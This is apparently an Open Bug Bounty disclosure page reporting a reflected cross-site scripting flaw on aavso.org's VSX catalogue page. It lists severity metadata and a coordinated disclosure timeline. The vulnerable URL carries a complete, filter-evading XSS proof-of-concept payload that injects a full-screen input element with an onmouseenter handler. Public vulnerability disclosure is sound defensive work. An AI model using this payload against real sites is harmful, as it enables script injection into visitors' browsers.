logo
DATABASE RESOURCES PRICING ABOUT US

aavso.org XSS vulnerability

Description

##### Open Bug Bounty ID: OBB-446158 Description| Value ---|--- Affected Website:| aavso.org Vulnerable Application:| Custom Code Vulnerability Type:| XSS (Cross Site Scripting) / CWE-79 CVSSv3 Score:| 6.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N] Remediation Guide:| OWASP XSS Prevention Cheat Sheet ##### Vulnerable URL: http://www.aavso.org/vsx/index.php?image=poss2ukstu_red%3C!%27/*!%22/*!\%27/*\%22/*--!%3E%3C/Title/%3C/script/%3E%3CInput%20Type=Text%20Style=position:fixed;top:0;left:0;font-size:999px%20*/;%20Onmouseenter=confirm`1`%20//%3E&oid;=133921&view;=detail.top# ##### Coordinated Disclosure Timeline Description| Value ---|--- Vulnerability Reported:| 1 December, 2017 13:02 GMT Vulnerability Verified:| 4 December, 2017 06:03 GMT Website Operator Notified:| 4 December, 2017 06:03 GMT Vulnerability Published:| 4 December, 2017 06:03 GMT[without any technical details] Public Disclosure:| 1 March, 2018 13:02 GMT